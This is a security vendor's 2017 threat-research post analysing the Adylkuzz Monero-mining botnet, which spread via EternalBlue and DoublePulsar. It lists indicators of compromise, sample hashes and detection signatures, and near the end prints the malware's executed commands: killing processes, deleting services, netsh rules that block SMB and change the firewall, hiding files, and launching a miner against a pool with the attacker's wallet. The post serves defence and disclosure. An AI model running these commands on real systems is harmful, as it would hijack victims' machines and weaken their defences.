Adylkuzz Cryptocurrency Mining Malware Spreading for Weeks ViaEternalBlue/DoublePulsarMAY 15, 2017 Kafeine

Overview

On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlueexploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue,originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages avulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discovervulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice.This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install theransomware known as WannaCry.

Over the subsequent weekend, however, we discovered another very large-scale attack using bothEternalBlue and DoublePulsar to install the cryptocurrency miner Adylkuzz. Initial statistics suggest thatthis attack may be larger in scale than WannaCry, affecting hundreds of thousands of PCs and serversworldwide: because this attack shuts down SMB networking to prevent further infections with othermalware (including the WannaCry worm) via that same vulnerability, it may have in fact limited thespread of last week’s WannaCry infection.

Symptoms of this attack include loss of access to shared Windows resources and degradation of PCand server performance. Several large organizations reported network issues this morning that wereoriginally attributed to the WannaCry campaign. However, because of the lack of ransom notices, wenow believe that these problems might be associated with Adylkuzz activity. However, it should be noted

that the Adylkuzz campaign significantly predates the WannaCry attack, beginning at least on May 2and possibly as early as April 24. This attack is ongoing and, while less flashy than WannaCry, isnonetheless quite large and potentially quite disruptive.

The Discovery

In the course of researching the WannaCry campaign, we exposed a lab machine vulnerable to theEternalBlue attack. While we expected to see WannaCry, the lab machine was actually infected with anunexpected and less noisy guest: the cryptocurrency miner Adylkuzz. We repeated the operationseveral times with the same result: within 20 minutes of exposing a vulnerable machine to the openweb, it was enrolled in an Adylkuzz mining botnet.

Figure 1: EternalBlue/DoublePulsar attack from one of several identified hosts, then Adylkuzz beingdownload from another host - A hash of a pcap of this capture is available in the IOCs table

The attack is launched from several virtual private servers which are massively scanning the Internet onTCP port 445 for potential targets.

Upon successful exploitation via EternalBlue, machines are infected with DoublePulsar. TheDoublePulsar backdoor then downloads and runs Adylkuzz from another host. Once running, Adylkuzzwill first stop any potential instances of itself already running and block SMB communication to avoidfurther infection. It then determines the public IP address of the victim and download the mininginstructions, cryptominer, and cleanup tools.

It appears that at any given time there are multiple Adylkuzz command and control (C&C) servershosting the cryptominer binaries and mining instructions.

Figure 2 shows the post-infection traffic generated by Adylkuzz in this attack.

Figure 2: Post-infection traffic associated with the attack

In this attack, Adylkuzz is being used to mine Monero cryptocurrency. Similar to Bitcoin but withenhanced anonymity capabilities, Monero recently saw a surge in activity after it was adopted by theAlphaBay darknet market, described by law enforcement authorities as “a major underground websiteknown to sell drugs, stolen credit cards and counterfeit items.” Like other cryptocurrencies, Moneroincreases market capitalization through the process of mining. This process is computationally intensivebut rewards miners with funds in the mined currency, currently 7.58 Moneros or roughly $205 at currentexchange rates.

Figure 3 shows Adylkuzz mining Monero cryptocurrency, a process that can be more easily distributedacross a botnet like that created here than in the case of Bitcoin, which now generally requiresdedicated, high-performance machines.

Figure 3: Part of the behavioral analysis from an Adylkuzz-infected VM showing it, among other things,closing SMB door and launching Monero Mining

One of several Monero addresses associated with this attack is shown in Figure 4. The hash rate showsthe relative speed with which the specific associated instance of the botnet is mining Moneros, while thetotal paid shows the amount paid to this particular address for mining activities. In this case, just over$22,000 was paid out before the mining associated with this address ceased.

Figure 4: One of several Monero addresses associated with income from Adylkuzz mining

Looking at the mining payments per day associated with a single Adylkuzz address, we can see theincreased payment activity beginning on April 24 when this attack began. We believe that the suddendrop that occurred on May 11 indicates when the actors switched to a new mining user address (Figure5). By regularly switching addresses, we believe that the actors are attempting to avoid having too manyMoneros paid to a single address.

Figure 5: Daily payment activity associated with a single Adylkuzz mining address

Statistics and payment history for a second payment address are shown in Figure 6. This address hashad just over $7,000 paid to date.

Figure 6: A second Monero address associated with income from Adylkuzz mining

A third address shows a higher hash rate and a current payment total of over $14,000 (Figure 7).

Figure 7: A third Monero address associated with income from Adylkuzz mining

We have currently identified over 20 hosts setup to scan and attack, and are aware of more than adozen active Adylkuzz C&C servers. We also expect that there are many more Monero mining paymentaddresses and Adylkuzz C&C servers associated with this activity.

Conclusion

Like last week’s WannaCry campaign, this attack makes use of leaked NSA hacking tools and leveragesa patched vulnerability in Microsoft Windows networking. The Adylkuzz campaign, in fact predatesWannaCry by many days. For organizations running legacy versions of Windows or who have notimplemented the SMB patch that Microsoft released last month, PCs and servers will remain vulnerableto this type of attack. Whether they involve ransomware, cryptocurrency miners, or any other type ofmalware, these attacks are potentially quite disruptive and costly. Two major campaigns have nowemployed the attack tools and vulnerability; we expect others will follow and recommend thatorganizations and individuals patch their machines as soon as possible.

Acknowledgments

We want to thank:

Indicators of Compromise

Selection of Domain/IP Address Date Comment

45.32.52[.]8 2017-05-16 Attacking host

45.76.123[.]172 2017-05-16 Attacking host

104.238.185[.]251 2017-05-16 Attacking host

45.77.57[.]194 2017-05-14 Attacking host

45.76.39[.]29 2017-05-15 Attacking host

45.77.57[.]36 2017-05-15 Attacking host

104.238.150[.]145 2017-05-14 Server hosting the payload binary

08.super5566[.]com 2017-05-14 Adylkuzz C&C

a1.super5566[.]com 2017-05-02 Adylkuzz C&C

aa1.super5566[.]com 2017-05-01 Adylkuzz C&C

lll.super1024[.]com 2017-04-24 Adylkuzz C&C

07.super5566[.]com 2017-04-30 Adylkuzz C&C

am.super1024[.]com 2017-04-25 Adylkuzz C&C

05.microsoftcloudserver[.]com 2017-05-12 Adylkuzz C&C

d.disgogoweb[.]com 2017-04-30 Adylkuzz C&C

panel.minecoins18[.]com 2014-10-17 Adylkuzz C&C in 2014

wa.ssr[.]la 2017-04-28 Adylkuzz C&C

45.77.57[.]190 2017-05-15 Host presenting same signature as attackers

45.77.58[.]10 2017-05-15 Host presenting same signature as attackers

45.77.58[.]40 2017-05-15 Host presenting same signature as attackers

45.77.58[.]70 2017-05-15 Host presenting same signature as attackers

Our friends at Trend Micro for input allowing us to add more IOCs•Cloudflare and Choopa for their immediate action upon notification.•@benkow_ for several inputs.•

Selection of Domain/IP Address Date Comment

45.77.56[.]87 2017-05-15 Host presenting same signature as attackers

45.77.21[.]159 2017-05-15 Attacking Host

45.77.29[.]51 2017-05-15 Host presenting same signature as attackers

45.77.31[.]219 2017-05-15 Host presenting same signature as attackers

45.77.5[.]176 2017-05-15 Host presenting same signature as attackers

45.77.23[.]225 2017-05-15 Host presenting same signature as attackers

45.77.58[.]147 2017-05-15 Host presenting same signature as attackers

45.77.56[.]114 2017-05-15 Host presenting same signature as attackers

45.77.3[.]179 2017-05-15 Host presenting same signature as attackers

45.77.58[.]134 2017-05-15 Host presenting same signature as attackers

45.77.59[.]27 2017-05-15 Host presenting same signature as attackers

Also available in MISP JSON format.

Select Dropped Samples

SHA-256 Date Comment

29d6f9f06fa780b7a56cae0aa888961b8bdc559500421f3bb3b97f3dd94797c2 2017-05-14 Pcap of the attack (filteredand a bit sanitized)

8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf233 2017-05-14 Adylkuzz.B spread viaEB/DP

450cb5593d2431d00455cabfecc4d28d42585789d84c25d25cdc5505189b4f9f 2017-04-24 Adylkuzz.A (we are not surethat instance was spread viaEB/DP)

a7000b2618512f1cb24b51f4ae2f34d332b746183dfad6483aba04571ba8b2f9 2017-05-14 s2bk.1_.exe

e96681456d793368a6fccfa1321c10c593f3527d7cadb1ff462aa0359af61dee 2017-05-14 445.bat (? seems to cleanupold variant of the coin minerand stop windows Update)

e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe Bitcoin miner process

55622d4a582ceed0d54b12eb40222bca9650cc67b39f74c5f4b78320a036af88 2017-05-02 Bitcoin miner process

6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3 2017-05-15 Adylkuzz.B spread viaEB/DP

fab31a2d44e38e733e1002286e5df164509afe18149a8a2f527ec6dc5e71cb00 2014-10-17 An old version of Adylkuzz

d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce04988 2017-05-15 Adylkuzz.B spread viaEB/DP

Executed commands:

taskkill /f /im hdmanager.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding taskkill /f /im mmc.exe sc stop WELM sc delete WELM netsh ipsec static add policy name=netbc netsh ipsec static add filterlist name=block netsh ipsec static add filteraction name=block action=block netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445protocol=tcp description=445 netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block netsh ipsec static set policy name=netbc assign=y C:\Windows\Fonts\wuauser.exe --server C:\Windows\Fonts\msiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6NtSRewnHF5MNA3LbQTBQV3v9i -p x -t 1 C:\Windows\TEMP\\s2bk.1_.exe /stab C:\Windows\TEMP\\s2bk.2_.log taskkill /f /im msiexev.exe netsh advfirewall firewall delete rule name="Chrome" netsh advfirewall firewall delete rule name="Windriver" netsh advfirewall firewall add rule name="Chrome" dir=in program="C:\ProgramFiles\Google\Chrome\Application\chrome.txt" action=allow netsh advfirewall firewall add rule name="Windriver" dir=in program="C:\Program Files\Hardware DriverManagement\windriver.exe" action=allow C:\Windows\445.bat C:\Windows\system32\PING.EXE ping 127.0.0.1 net stop Windows32_Update attrib +s +a +r +h wuauser.exe C:\Windows\system32\SecEdit.exe secedit /configure /db C:\Windows\netbios.sdb C:\Windows\system32\net1 stop Windows32_Update

Select ET signatures

2024217 || ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray 2024218 || ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response 2024216 || ET EXPLOIT Possible DOUBLEPULSAR Beacon Response 2000419 || ET POLICY PE EXE or DLL Windows file download 2826160 || ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2017-04-28 1) 2017398 || ET POLICY Internal Host Retrieving External IP via icanhazip.com - Possible Infection 2022886 || ET POLICY Crypto Coin Miner Login

Most recent

6 DAYS AGO

Jaff - New Ransomware From the Actors Behind the Distribution of Dridex, Locky, and Bart

1 WEEK AGO

Introducing Loda Malware

2 WEEKS AGO

APT Targets Financial Analysts with CVE-2017-0199

3 WEEKS AGO

Facebook Spam Botnet Trades Account Access for Likes

3 WEEKS AGO

Philadelphia Ransomware Brings Customization to Commodity Malware

Related Links

Ransomware Survival Guide

Threat Reference

Proofpoint Blog

Threat Insight Blog

Events

Media Contacts

Company Information

Quick links

About Proofpoint

Board of Directors

Careers

Corporate Blog

Investors Center

Leadership Team

News Center

Daily Ruleset Summary

IP Address Blocked?

Threat Insight (blog)

Upgrade from McAfee

© 2017 . All rights reserved. Privacy Policy.

Connect

Regions

United States United Kingdom France Germany Spain Japan Australia

See all contacts

Send us a message

Chat